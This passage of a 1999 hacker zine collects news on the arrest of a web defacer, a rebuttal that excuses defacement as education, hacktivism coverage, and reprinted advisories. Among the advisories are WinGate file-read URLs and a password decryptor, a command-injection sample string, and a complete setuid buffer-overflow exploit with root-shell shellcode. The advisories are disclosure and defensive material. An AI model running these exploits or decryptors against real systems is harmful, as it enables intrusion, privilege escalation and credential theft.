      When he heard the name Zyklon bells went off. My friend
      remembered all the stories I had told him about my search.

      I sent my friend's contact an e-mail file with all the data I had on
      Zyklon. I did this in the hope it would finally stop him.

      Since I'd last checked on him, Zyklon had been busily hacking
      in Toronto, Florida, Japan, Los Angeles and many other cities
      and countries.

      My friend's friend discovered that a company in Florida was
      being hacked and sent them an e-mail warning them.
      Unfortunately, the Florida company was just trying to find out
      why their computers had crashed. He got a call back within
      hours. The FBI had been called in.

      They set up a trace on the company's Internet access and
      monitored all the Internet sessions. Zyklon was not quite
      finished with the site in Florida, but he soon would be.

      The FBI captured the full hacking session and Zyklon's Internet
      address, his electronic fingerprints.

      Last week, they moved in and arrested Zyklon. He is now being
      charged with computer crime offences. U.S. federal law allows
      every state a hacker passed through on the Internet to press
      charges.

      His computer equipment has been taken away. And apparently,
      his parents are really upset.

      Justice may be delayed, but when it comes it can be so sweet.



      John Howell is a computer systems expert.

 28.1  Rebuttal by Fluxx;
       ~~~~~~~~~~~~~~~~~~
             
      "The Untold Truth About Zyklon, The Security Specialist Trying To Make A Difference."

         Before I begin, let me introduce myself.  I go by the name Fluxx.
       This article is a follow up to the article written by John Howell 
       published on April 3rd.
       
         Clarification being the primary objective.  The previous article
       contained a lot of what I like to call FUD (Fear, Uncertainty & Doubt)
       which usually comes from people lacking the proper information and/or
       knowledge.
       
         I have known "Zyklon" for 3 years now, and we are close friends.
       It sickens me to see some of the vicious slander that Mr. Howell spews
       out without knowing this to actually be fact.  First of all, Zyklon was
       an alias he picked out a few years ago because it was catchy, not 
       because he is some Nazi, like Mr. Howell describes him to be.
       Secondly, his goal is to educate network security administrators of 
       the flaws that their servers are vulnerable to.  As Mr. Howell so cleverly
       pointed out, it's hard to convince a company that they have been breached
       without them actually seeing the damage.  What better way to prove it to
       a large company, other than to modify their corporate webpage?  Sure, it
       still is illegal entry to computer systems, and some could also say
       damaging data, but that remains to be seen.  I have seen countless system
       penetrations from Zyklon in the past, and he has always backed up their
       original html files, and patched their security vulnerabilities, another
       good point Mr. Howell declined to add.  What I would also like to know is,
       why Mr. Howell is so proud of himself having "caught" Zyklon owning up to
       his "crimes" on IRC.  Does he think IRC logs will stand up in court? I'm
       sorry to say my friend, they won't.
       
         There are many different kinds of hackers out there.  Political 
       Activist hackers who do it for a cause.  Malicious hackers who do it
       to cause as much damage as they can, most commonly younger kids on a joy
       ride.  Finally, you've got the average hacker whose curiosity gets the
       best of him, and all he strives for is to learn, secure and move on.
       Getting inside of a hacker's head is a ride not many have the chance to
       take.  Most commonly referred to as Generation-X techno kids, hackers are
       not always kids.  I personally know hackers who are grandfathers.  It has
       become a lifestyle in the 90's, and the world has finally come to realize
       that.
       
         As technology progresses faster and faster every day towards the year
       2000, Internet and corporate network security tightens up ever so slowly.
       In most cases, that's thanks to people like Zyklon.  The world wide web has
       become a huge medium for companies, and business is good.  Customers
       appreciate stable tight security for their sites, they do not expect to
       pop up their webpage one Sunday morning and have happy faces all over it.
       Essentially, breaking down server security now, is the most efficient way
       in making people more aware of the rising threat.  Classically, most
       webservers run or have access to some sort of cgi-bin directory, which
       contains many programs available to the advanced browsing user to issue
       remote commands to the internal server, to retrieve issued requests.  Now
       for normal folk, they would never see these.  They would have no need to
       see them, but for a hacker its the peephole staring directly into the soul
       of the machine.  Mr. Howell also mentioned this, describing it as
       "a back door (a login that bypasses security) to give access to the Web
       site's main computer server".  This is not entirely true.  What occurs is
       the WWW server software has access levels it needs to fulfill to run one of
       the cgi-bin programs. A website that is on-line with one of the many
       vulnerable cgi-bin programs is now open to be exploited. This cgi-bin may
       be used to issue commands to the computer, remotely (not from the keyboard)
       to the operating system.  A hacker's light at the end of the tunnel,
       metaphorically speaking.  Don't get me wrong, this isn't the only way
       hackers exploit systems.  This is one (quite old technique) that STILL is
       vulnerable on thousands of machines spanning across the world.
       
         In the end, hackers will always be here, and like life has shown us, there
       are always good and bad points to every argument.  Let us sit, and idly
       ponder why such brilliant computer specialists are not working for these
       large corporations.  Kinda makes you wonder what the current security
       administrators are doing, eh?
       
       
                                                                       Fluxx 
                                                                       Born & Raised In Canada.
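
       The cgi-bin problem Fluxx describes above, worked through as an added
       example; this code is not part of his rebuttal or of the zine. A CGI
       program takes a query-string parameter, URL-decodes it and splices it into
       a shell command line. A shell metacharacter arrives encoded (";" as %3B),
       survives decoding, and the shell runs whatever follows it. The hardened
       variant refuses anything outside a tight character allowlist instead of
       trying to strip metacharacters. The function names and the hostile query
       string are constructed for this illustration.

```c
/* Added example: classic cgi-bin command injection, vulnerable and hardened.
 * Not from the original article; names and sample input are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Decode %XX escapes and '+' the way a CGI program must before using a
 * query parameter.  Returns the number of bytes written (NUL-terminated). */
size_t url_decode(const char *in, char *out, size_t outsz) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < outsz; i++) {
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1])
                         && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);   /* "%3B" -> ';' */
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return o;
}

/* Vulnerable: the decoded value goes straight into a shell command line,
 * so "foo%3Bcat+/etc/passwd" becomes "finger foo;cat /etc/passwd".
 * Returns 1 if the command fit in the buffer. */
int build_command_vulnerable(const char *param, char *cmd, size_t cmdsz) {
    char decoded[256];
    url_decode(param, decoded, sizeof decoded);
    return snprintf(cmd, cmdsz, "finger %s", decoded) < (int)cmdsz;
}

/* Allowlist check: only letters, digits, '.', '-' and '_' are acceptable as
 * a user or host name; everything else (';', '|', '`', '$', spaces, quotes)
 * is refused outright.  Returns 1 if safe, 0 otherwise. */
int is_safe_argument(const char *s) {
    if (*s == '\0' || strlen(s) > 32) return 0;
    for (; *s; s++) {
        unsigned char c = (unsigned char)*s;
        if (!(isalnum(c) || c == '.' || c == '-' || c == '_')) return 0;
    }
    return 1;
}

/* Hardened: validate after decoding, and refuse rather than "clean up".
 * Returns 1 if a command was built, 0 if the input was rejected. */
int build_command_hardened(const char *param, char *cmd, size_t cmdsz) {
    char decoded[256];
    url_decode(param, decoded, sizeof decoded);
    if (!is_safe_argument(decoded)) return 0;
    return snprintf(cmd, cmdsz, "finger %s", decoded) < (int)cmdsz;
}

int main(void) {
    const char *hostile = "foo%3Bcat+/etc/passwd";   /* constructed attack */
    char cmd[512];
    build_command_vulnerable(hostile, cmd, sizeof cmd);
    printf("vulnerable CGI would run : %s\n", cmd);
    printf("hardened accepts 'foo'   : %d\n", build_command_hardened("foo", cmd, sizeof cmd));
    printf("hardened accepts hostile : %d\n", build_command_hardened(hostile, cmd, sizeof cmd));
    return 0;
}
```

       The allowlist is the minimum; the structural fix is not to involve a
       shell at all and to exec the program directly with an argument vector,
       so that there is no command line for a metacharacter to break out of.
       Note also that the check runs on the decoded string: validating before
       decoding is the mistake that lets %3B through.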

       
       
       @HWA
       
  29.0 Atlanta based ISS seeks to hire hackers from Aussie land..
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       Scoped via HNN 
       http://www.it.fairfax.com.au/990406/networking/networking1.html
       <a href="http://www.it.fairfax.com.au/990406/networking/networking1.html">Link</a>
          
           
           The good, the bad, and the hackers 
    
           By PHILIPPA YELLAND | 
    
           LOOK! Up on the Internet. Is it the X Files? Is it Star Wars? 
           Is it Ghostbusters? No, it's the X-Force. This
           offshoot of Internet Security Systems is looking to
           hire a good hacker (yes, there are such beings) to
           join its worldwide team dedicated to truth, justice,
           and uncovering new security risks. 
    
                         There's a thin line of bits and
                         bytes between the good and
                         the bad hackers, ISS's local
                         managing director Steven
                         Laskowski says. 
    
                             Some, like Star Wars' Darth
          Vader, choose to go over to the dark side and use
          their powers to bring down governments,
          multinationals, and corporations. Others, like Luke
          Skywalker, use their abilities in the service of ISS to
          warn subscribers of threats to their operating
          systems, applications and networks. 
    
          Laskowski is searching for a very rare kind of
          person to join the elite band of hacker-busters. She
          or he must be ethical, endlessly patient, be very
          knowledgeable about systems and applications,
          understand computer architecture, and have been
          hacking for many years. 
    
          ``We're looking for someone who can keep their
          finger on the pulse of the underground hacking
          community, yet who can look at applications to find
          their vulnerabilities,'' Laskowski says. 
    
          ISS says that applications, particularly from
          Microsoft, are the new favorite for hackers. ``Bill
           Gates is targeted particularly because he's the
          antithesis of the hacker mentality,'' Laskowski says. 
    
          When Laskowski finds a suitable local Jedi, she or
          he won't have to worry about splashing out on
          corporate suits and high heels. ``In our head office
          at Atlanta, X-Force team members' workmates
          include two snakes, one iguana, and three spiders,''
          Laskowski says. 
    
          ISS is already sending out warnings to corporate
          subscribers that solutions to the Y2K problem may
          become security issues themselves. ``Businesses
          are locking down apps so they're Y2K-compliant
          and this means there can be no patches. This is a
          hackers' bonanza. 
    
          ``Second, Y2K is an industrial espionage minefield.
          Hackers are waiting until after 1 January 2000 to
          break in, knowing that the blame will be directed at
          the Y2K solution, not the hacker." 
    
          Australia is increasingly important in The Empire.
          ISS's 25-year-old founder, Chris Klaus, is paying a
          physical - as opposed to a virtual - visit next month,
          and the X-Force's chief sweat shirt, Christopher
          Rouland, is beaming over in June. 
    
          Steven Laskowski can be reached on
          slaskowski@iss.net 
           
       
       @HWA
       
  30.0  More on hacktivism from the Globe...
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
      <a href="http://www.Boston.com/dailyglobe2/093/nation/Electronic_infiltration_is_burgeoning_war_zone_of_hackers_worldwide+.shtml">Link</a>
  
      Electronic infiltration is burgeoning war
      zone of hackers worldwide 

      By Patti Hartigan, Globe Staff, 04/03/99 

         Beavis and Butt-head, the cackling cartoon characters, stare out from a
          NASA Web page, their fists raised in a sort of virtual protest. These
      familiar figures from American popular culture are hardly the new image of
      the space agency: The site was ''hacked,'' or corrupted, yesterday by a
      group of Russian computer experts who posted the same message on a
      NATO Web site in Egypt. The hacked sites, signed ''From Russia With
      Love,'' are scrawled with a profane message denouncing NATO as well as a
      demand for allied troops to ''Go away from Kosovo.''

      While the real war in the Balkans is waged on the ground and in the air, a
      virtual war is being fought in cyberspace. In the past few days, hackers on
      both sides of the conflict have been defacing Web sites with electronic
      graffiti and launching programs designed to slow down or crash their
      opponents' servers. 

      On Wednesday, the NATO server in Belgium was bombarded with
      thousands of e-mail messages from Yugoslav hackers that overloaded its
      Web site. Another group, called ''Russian Hackers Union,'' defaced a US
      Navy site.

      Hacking groups in the United States and Europe are retaliating with their
      own graffiti. Team Spl0it, a coalition that includes an 18-year-old American
      hacker, broke into several Web sites and posted such antiwar slogans as,
      ''Tell your governments to stop the war.'' Hackers on the West Coast are
       trying to crack the Serb government site, although the server is said to be
      extremely secure and based in London. And the Kosovo Hackers Group, a
      coalition of European and Albanian hackers, has erased at least five sites
      and replaced them with black and red ''Free Kosovo'' banners.

      In what is being called the first Internet war, hackers are emerging as
      electronic vigilantes. At the same time that governments are inundating the
      Internet with propaganda and individuals are using the medium to
      communicate, hackers have actually taken the battle into their own hands,
      performing military exercises with the click of a mouse.

      It's called ''hacktivism,'' the marriage of computer hacking and political
      activism. This form of protest has been around since 1995, when hackers
      became politicized to support convicted hacker Kevin Mitnick. Most
      electronic civil disobedience is illegal in the United States, but this is the first
      time it has been employed during an international conflict, and there is no
      precedent that governs such conduct.

      Michael Vatis, chief of the FBI's National Infrastructure Protection Center,
      said through a spokesman yesterday that he had no comment on the recent
      rage of hacktivism. 

      In past international conflicts, governments have successfully disrupted the
      telecommunications systems of their opponents. But in the age of the
      Internet, this is the first time that private citizens have been able to jump into
      the fray.

      ''This is the harbinger of things to come,'' said Barry Steinhardt, former
      president of the Electronic Frontier Foundation and associate director of the
      American Civil Liberties Union. ''It's a free and open network. Parts of it are
      sealed off, but it's a porous network. It's inevitable that you're going to get
      vigilantes acting in an extralegal way.''

      Hackers have traditionally objected to attempts to curtail free speech, and
      American hackers are outraged by Serb government censorship. One
      member of Team Spl0it, an 18-year-old resident of the East Coast who
      goes by the handle f0bic said in an e-mail message that he and others
      decided to take action a few weeks ago. ''I, along with the rest of my team,
      decided to get the message out on the Internet,'' he wrote. ''Our message
      was bright and clear: Stop the war before we go to World War III.'' The
      Globe has confirmed his existence, but he asked that his name not be used.

      In the past, the Electronic Frontier Foundation, a leader in Internet policy,
      has contended that hacktivism is illegal and can be neither encouraged nor
      condoned. But that may change in an international conflict. 

      ''We may want to reevaluate that in light of the historical importance that civil
      disobedience has played as a means of protest,'' said Alex Foster, the
      foundation's director of public affairs. ''Does hacktivism change in a crisis
      situation? I don't have an answer on that yet.''

      Foster warned that ordinary citizens who are using the Internet to
      communicate their own political opinions legally should be careful, though.
      ''People in Serbia who are using the Internet for normal things like sending
      e-mail may be putting themselves at great risk,'' he said. 

      But US and Russian hacktivists continue their cyberwar unconcerned about
      repercussions. ''We are activists because we see there are wrongs that need
      to be corrected,'' f0bic wrote. 

      This story ran on page A02 of the Boston Globe on 04/03/99. 
       © Copyright 1999 Globe Newspaper Company. 
     
       
       
        @HWA
        
  31.0 WinGate 3.0 problems
       ~~~~~~~~~~~~~~~~~~~~
       
       Date: Mon, 5 Apr 1999 17:52:51 -0700
       From: Marc <Marc@EEYE.COM>
       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
       Subject: Multiple WinGate Vulnerabilities[Tad late]
       
       At first we were just going to post this advisory to our website but after
       the subject came up on the NTSEC list and we got a few emails telling us to
       post it to the other lists... well here it is.
       
       Signed,
       Marc
       eEye Digital Security Team
       http://www.eEye.com
       
       P.S.
       Go see Matrix.
       
       ________________________________________________________________________
       
       eEye Digital Security Team <e>
       www.eEye.com
       info@eEye.com
       February 22, 1999
       ________________________________________________________________________
       
       Multiple WinGate Vulnerabilities
       
       Systems Affected
       WinGate 3.0
       
       Release Date
       February 22, 1999
       
       Advisory Code
       AD02221999
       
       ________________________________________________________________________
       
       Description:
       ________________________________________________________________________
       
        WinGate 3.0 has three vulnerabilities:
       1. Read any file on the remote system.
       2. DoS the WinGate service.
       3. Decrypt WinGate passwords.
       
       ________________________________________________________________________
       
       Read any file on the remote system
       ________________________________________________________________________
       
        We were debating if we should add this to the advisory or not. We
        figured it would not hurt so here it is.
        The WinGate Log File service in the past has had holes where you can
        read any file on the system; the holes still seem to be there, and
        some new ways of doing it have cropped up.
       
       http://www.server.com:8010/c:/ - NT/Win9x
       http://www.server.com:8010// - NT/Win9x
       http://www.server.com:8010/..../ - Win9x
       
       Each of the above URLs will list all files on the remote machine.
       There are a few reasons why we were not sure if we were going to post
       this information.
       
        By default all WinGate services are set so that only 127.0.0.1
        can use the service. However, the purpose of the log file service is
        to let users remotely view the logs, so chances are people using the
        log file service are not going to be leaving it on 127.0.0.1. Also by
        default in the WinGate settings "Browse" is enabled. We are not sure if
        the developers intended the Browse option to mean the whole hard drive.
        We would hope not.
       
       The main reason we did put this in the advisory is the fact that
       the average person using WinGate (Cable Modem Users etc..) are not the
       brightest of people and they will open the Log Service so that everyone
       has access to it. We understand there are papers out there saying not
        to do this and even the program itself says not to, but the average
       person will not let this register in their head as a bad thing so the
       software should at least make it as secure as possible. Letting people
       read any file is not living to that standard. Any way, lets move on...
       ________________________________________________________________________
       
       DoS the WinGate Service
       ________________________________________________________________________
       
       The Winsock Redirector Service sits on port 2080. When you connect to it
       and send 2000 characters and disconnect it will crash all WinGate
       services. O Yippee
       
       ________________________________________________________________________
       
       Decrypt the WinGate passwords
       ________________________________________________________________________
       
       The registry keys where WinGate stores its passwords are insecure and
       let everyone read them. Therefore anyone can get the passwords and
       decrypt them. Code follows.
       
       ________________________________________________________________________
       
        // ChrisA@eEye.com
        // Mike@eEye.com
        //
        // Reverses WinGate's password obfuscation: each byte of the stored
        // value is XORed with (position + 1) << 1, a fixed keystream that
        // needs no key. Pass the raw registry value as argv[1]; the
        // plaintext is written to stdout.
        
        #include <stdio.h>
        #include <string.h>
        
        int main(int argc, char *argv[]) {
        size_t i, len;
        
        if (argc < 2) {
        fprintf(stderr, "usage: %s <obfuscated-password>\n", argv[0]);
        return 1;
        }
        len = strlen(argv[1]);   /* size_t: a char counter overflows past 127 bytes */
        for (i = 0; i < len; i++)
        putchar(argv[1][i] ^ (char)((i + 1) << 1));
        return 0;
        
        }
       ________________________________________________________________________
       
       You get the idea...
       
        It is good that WinGate 3.0 by default locks down all services to 127.0.0.1.
        However, there still seem to be holes where, if one gets access to a
        WinGate service from a non-blocked IP, they can do some damage. Chances
        are if you poke hard at some of the other services you will find similar
        problems to the above. Software developers need to remember that the avg.
        user is not always the brightest, so our products' security must be as
        tight as possible.
       
       ________________________________________________________________________
       
       Vendor Status
       ________________________________________________________________________
       
        Contacted a month or so ago, have heard nothing. Someone from the NTSEC
        list contacted eval-support@wingate.net with our findings and they were
        sent an email back rather quickly. We had sent our emails to
        support@wingate.net and things of the such. Maybe all three of our
        emails just got lost. The last we've heard WinGate is taking steps to fix
        the problem. Look for patches soon.
       
       ________________________________________________________________________
       
       Copyright (c) 1999 eEye Digital Security Team
       ________________________________________________________________________
       
       Permission is hereby granted for the redistribution of this alert
       electronically. It is not to be edited in any way without express consent of
       eEye. If you wish to reprint the whole or any part of this alert in any
       other medium excluding electronic medium, please e-mail alert@eEye.com for
       permission.
       
       ________________________________________________________________________
       
       Disclaimer:
       ________________________________________________________________________
       
       The information within this paper may change without notice. Use of this
       information constitutes acceptance for use in an AS IS condition. There are
       NO warranties with regard to this information. In no event shall the author
       be liable for any damages whatsoever arising out of or in connection with
       the use or spread of this information. Any use of this information is at the
       user's own risk.
       
       Please send suggestions, updates, and comments to:
       eEye Digital Security Team
       info@eEye.com
       http://www.eEye.com
       
       @HWA
        
      
  32.0 Sekure team releases problems found with ISS-scanner including rewt sploit
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  
       
                                         Sekure SDI
                                    http://www.sekure.org
                                 ---------------------------
                              Brazilian Information Security Team
       
       
                             -> Internet Scanner Buffer Overflow <-
                                    (SDI.03-99.iss-scanner)
       
       ---
       complexity      : medium
       critical level  : medium
       ---
       
        1. Introduction 
       
           Internet Scanner (I.S) is a widely known tool to audit the security level
        of a certain network. It has a database which will assist in the detection of
        the common security holes that may help an intruder to gain access or
        gather private information from the scanned host.
        
           During the checks, I.S. will run a set of procedures that require
        privileges on the local host (root), so an ordinary user may not start a
        scan. 
        
           Although it's not the default configuration, it's common, in certain
        cases, to set the suid bit to permit "root privileges" so the "audit" user, 
        who does not have the necessary privileges, may execute a scan.
        
           A certain problem was found in the IS program during some tests in
        our lab. While by default it will not represent a threat, in the above
        situation (suid bit owned by root), it will become a security gap.
       
       
        2. I.S Flaw
       
           Internet Scanner does not check bounds on some arguments it receives from
        the command line, which will cause a segmentation fault.
        
            sekure:~$ ./iss -D `perl -e "print 'A' x 2000"`
            Creating Directory /usr/local/iss/scans/s.199903241212
            # Time Stamp(2103): Signal - Segmentation Violation: (...)
            (..)
            ISS Scan was interrupted.
            Segmentation fault
       
            sekure:~$ ./iss -c `perl -e "print 'A' x 2000"`
            (...)
            Segmentation fault
       
          Let's check the return address:
       
            (gdb) run -D `perl -e "print 'A' x 2000"`
            Starting program: iss -D `perl -e "print 'A' x 2000"`
            (...)
            Program received signal SIGSEGV, Segmentation fault.
            0x41414141 in ?? ()
            (gdb)
        
           In this situation, we can reach the return address (which holds the
        place in memory the program must return to), so we may execute arbitrary
        commands, and in the "suid bit" situation they will be executed with root 
        privileges.
       
       
         3. Who is vulnerable ?
        
          If you are running I.S using the SETUID bit to grant root privileges
        to an ordinary user, then you ARE vulnerable to this attack.
          
          If you are using the DEFAULT configuration of I.S, you are NOT
        vulnerable.
       
        
         4. Fixing the situation
       
          ISS, the vendor of I.S, does not provide the source code along
        with the program, so we cannot provide a quick patch. 
        
          We advise you to remove the suid bit and contact the vendor for a
        correction.
        
          We also advise you to avoid the use of the suid bit unless you are familiar
        with the purpose of the program.
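        A check for the precondition this advisory describes (Internet Scanner
        installed setuid root) together with the fix it recommends, as an added shell
        example that is not part of the Sekure advisory; it assumes the advisory's
        default install path /usr/local/iss and the binary name iss from its transcript.

```shell
#!/bin/sh
# Added example (not from the Sekure advisory): report whether the Internet
# Scanner binary is installed setuid root, list every setuid file under its
# install directory, and apply the advisory's fix (remove the suid bit).
# ISS_HOME defaults to the advisory's path; "iss" is the binary name it shows.

ISS_HOME="${ISS_HOME:-/usr/local/iss}"

# suid_state FILE: prints one of  missing | clean | setuid | setuid-root.
# Parses ls -ld so it also works on old systems that have no stat(1).
suid_state() {
    _f=$1
    [ -f "$_f" ] || { echo missing; return 0; }
    set -- $(ls -ld "$_f")          # $1 = mode string, $3 = owner
    case $1 in
        ???[sS]*)                   # 4th mode char is s/S: setuid bit set
            if [ "$3" = root ]; then echo setuid-root; else echo setuid; fi ;;
        *)  echo clean ;;
    esac
}

# list_setuid DIR: every regular file below DIR carrying the setuid bit.
# -xdev keeps the walk on one filesystem; unreadable dirs are silently skipped.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# drop_setuid FILE: the advisory's remediation (chmod u-s), then re-check.
drop_setuid() {
    chmod u-s "$1" && suid_state "$1"
}

# Stand-alone run: audit the Internet Scanner install directory if present.
if [ -d "$ISS_HOME" ]; then
    echo "iss binary: $(suid_state "$ISS_HOME/iss")"
    echo "setuid files under $ISS_HOME:"
    list_setuid "$ISS_HOME"
else
    echo "$ISS_HOME not present on this host; nothing to audit"
fi
```

        A result of setuid-root for the iss binary is exactly the configuration
        section 3 calls vulnerable; drop_setuid returns it to the default (clean) state.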
         
         
         5. Exploiting the bug
       
          We believe information must be freely available. If we don't provide the
        exploit script along with the information, someone else will. 
        
          We also know that people like to see with their own eyes to believe
        they are vulnerable. So here it is:
       
       ------------- SDI-iss.c -----------------------------
        /* 
         *  Sekure SDI - http://www.sekure.org  
         *  Brazilian Information Security Team  
         *  By c0nd0r <condor@sekure.org>
         *
         *  . ..Internet Scanner (ISS) Buffer Overflow.. .  
         *  (read the original advisory at http://www.sekure.org/advisory.html)
         *    
         *  > This may not represent a threat if you are
         *  > NOT using IS with setuid root
         *
         *  This code is only for educational purposes.
         *  ------------------------------
         *  Instructions: After the compilation, execute it to get 
         *  a shell prompt with the $EGG in the environment.
         *  tiazinha:~$ SDI-iss
         *  bash$ ls -tarl iss
         *  -rwsr-xr-x   1 root     daemon    1691180 Dec 10 15:22 iss*
         *  bash$ ./iss -c $EGG   
         *  
         *  Creating Directory /usr/local/iss/scans/s.199903261158
         *  id;
         *  uid=666(condor) gid=100(deejay) euid=0(root) groups=12(mail)
         *  -------------------------------
         *  PS: the i/o descriptors (stdin/stdout) are used by IS; as this is 
         *  just an example, I'll not worry about that. 
         */
        
        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>
        
        /* Linux/x86 execve("/bin/sh") shellcode */
        char shellcode[]=
                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                "\x80\xe8\xdc\xff\xff\xff/bin/sh";
        
        #define ISS_HOME "/usr/local/iss"
        
        int main ( int argc, char *argv[]) {
          char buff[2048];
          /* putenv() keeps a pointer to the string it is handed, so each
             variable needs its own buffer (the original reused one buffer,
             which silently replaced ISS_HOME with the EGG value) */
          char env_home[250], env_egg[250];
          long addr;
          int x, y, offset=0, src;
        
          if (argc > 1) offset = atoi(argv[1]);
        
          /* NOP sled followed by the shellcode, 238 bytes in total */
          for ( x = 0; x < (238-strlen(shellcode)); x++) 
            buff[x] = 0x90;
        
          for ( y = 0; y < strlen(shellcode); y++, x++)
            buff[x] = shellcode[y];
        
          addr = (long) &src + offset;  /* computed but unused: the address below is hardcoded */
          (void) addr;
          printf ( "SDI I.S. Exploit Code\n");
          printf ( "4 educational purpose only\n");
          printf ( "Please, go to ISS directory and run:\n");
          printf ( "./iss -c $EGG\n\n");
        
          /* the program messes with the stack so I prefer to set it 
             by my own hands, no prob, just a little bit different */
          
          buff [x++] = 0x60; 
          buff [x++] = 0xef; 
          buff [x++] = 0xff; 
          buff [x++] = 0xbf; 
          /* it works fine in my slak3.5 box */
        
          /* terminate right after the address bytes (the original called
             strlen() on the still unterminated buffer at this point) */
          buff[x] = '\0';
        
          snprintf ( env_home, sizeof(env_home), "ISS_HOME=%s", ISS_HOME); 
          putenv ( env_home);
        
          snprintf ( env_egg, sizeof(env_egg), "EGG=%s", buff);
          putenv ( env_egg);
          system ( "/bin/sh");
        
          return 0;
        }
       --------------------- eof ------------------
       
         6. Contacts
       
         Sekure SDI
         http://www.sekure.org
         info@sekure.org
       
         This advisory has been written by SSC (Sekure SDI Secure Coding Group)
         http://ssc.sekure.org
         securecode@sekure.org
       
         Subscribe the Best of Security Brazil - mailing list
         http://bos.sekure.org
         bos-br-request@sekure.org
         (the main language is portuguese but everybody is welcome)
       
       
       ----
       written by c0nd0r
       condor@sekure.org
       
       
       -condor
       www.sekure.org
        s e k u r e  
       
       pgp key available at: http://condor.sekure.org/condor.asc
       
       @HWA    
      
       
  33.0  FileGuard crack, security vulnerabilities.
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~       
       
       
                    ___________________________
                   /        /        /        /\
            ______/    ____/    ____/        / /
           /     /        /        /    ____/ /
          /     /____    /    ____/        / / 
         / / / /        /        /        / /
        /_/_/_/________/________/________/ /
        \_____\________\________\________\/
        / . ../Macintosh  Security/.. .  /
       /________________________________/
       Presents:
       
       
       Security Holes In FileGuard 3.0.8
       
       
       
       Table Of Contents:
       
       - Introduction
       - Gaining Full Access
       - Launching The Cracked FileGuard Application
       - Password Protected Volumes
       - Disclaimer
       - End notes
       
       
       --==< Introduction >==--
       
        By far FileGuard is the best protection software for the Macintosh OS.
        To start with, it disables the debugger during operations where an attack could
        be expected.  So it's pretty difficult to find out what algorithm it 
        uses to encrypt the passwords.  Not impossible, but not as easy as in 
        various other protection software for the Mac.
        
        Let's start by analyzing what FileGuard can do to protect a computer. 
        Well, the appropriate question is more like, what CAN'T FileGuard do?  
        It can protect volumes, it can encrypt files, it can password protect 
        applications, it can limit access to files/folders, etc...  And it 
        does not have the weaknesses that other security programs have, such
        as "emergency passwords" or letting the user remove extensions with
        programs such as FileBuddy.  Shift disable works but is useless 
        if the hard disk is password protected.
       
       
       --==< Gaining Full Access >==--
       
        So this is nice and all, as long as only the administrator can change 
        the various access settings.  But what happens if the attack comes from
        the most unexpected place?  The FileGuard application itself.  This is 
        the application that allows the administrator to change the settings of
        the various protection facilities.  Naturally it's protected.  It only 
        launches if the administrator's password is entered.  However, this password
        protection can easily be cracked.  And once it's cracked - meaning that 
        it'll accept any password as the admin password - then anyone can make the 
        changes to the settings that an admin could make.
       
       
       --==< Launching The Cracked FileGuard Application >==--
       
        Launching the cracked application might actually prove to be a problem 
        depending on how limited the user's access to the computer is.  The easiest
        way to launch the cracked FileGuard app is through a user account with the 
        authority to copy and launch applications.  Then the FileGuard application 
        can be copied onto the computer and launched from there.  However, a system
        is still vulnerable if the user is not allowed to copy applications.  If 
        the user has enough access to launch applications from floppy disks, then 
        the cracked FileGuard app can simply be copied to a disk and launched from
        there.
        
        This method can be exploited through the guest account (if the guest account
        is enabled).  The access to the computer using a guest account might be rather
        restricted.  For example, floppy disks might not be allowed to be inserted into
        the computer.  However, users will still be able to insert CDs, and if one has a
        copy of the cracked FileGuard app on it then it can be launched from there.
       
       
       --==< Password Protected Volumes >==--
       
       I remember how once my computer teacher locked the HD on his computer with 
       FileGuard and something happened to the password.  He spent hours on the net
       before he found out some way of bypassing this problem.  The only way available
       until now was to install a new driver onto the hard drive.  Unfortunately this 
       corrupts the disk.  
       
       Highware has designed a program for situations such as this called EmergencyRemove.
       EmergencyRemove can be used to remove the drive-protection in emergency situations.
       However, even EmergencyRemove requires the appropriate password to be entered in
       order for the protection to be removed.  And this is where the security hole is;
       by cracking EmergencyRemove so that it'll accept any password anyone can remove the
       volume protection from any protected disk.
       
        NOTICE:  I have not actually tried password protecting my hard disk.  So I don't 
        actually "know" whether this method works on hard drives.  I did, however, try this
        method on floppy disks and each attempt was successful.
       
       
       --==< Disclaimer >==--
       
        These security holes are very real and may be exploited for "damaging" purposes.
        The objective of this text file was NOT to encourage such behavior but simply to
        point out the existing security holes of FileGuard 3.0.8.  Therefore, neither mSec
        nor any of its past, current or future members will take any responsibility for any
        kind of damage that may occur from any direct or indirect use of the information provided.
       
       
       --==< End Notes >==--
       
       Two patches have been included with this text file as examples of how FileGuard and 
       EmergencyRemove can be exploited.
       
       These security holes were found by mSec.  If you are interested in finding out more
       about mSec please visit our homepage at: www.msec.net.  You can also reach us and 
       chat with the members on our Hotline server at: msec.net.
       
       This text file was put together by ProZaq.  If you have any questions or comments my
       e-mail address is: prozaq@usa.net
       
       
       http://www.msec.net/texts/texts/FileGuard_308_Holes.txt

        @HWA
      
 34.0  Linux system administration mini-howto by Pestilence
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~	
       
       Release Date : 6th April 1999
       Previous Versions: none
       
       Linux Mini Administration HOWTO.
       By Kostas Petrakis aka Pestilence.
       
        This was written mostly as a small guide for some NT-based co-workers here at
        my work so that they could check a few things on Linux systems if needed.
        Also I decided to write this because there are lots of administration HOWTOs
        out there which are also kinda old.
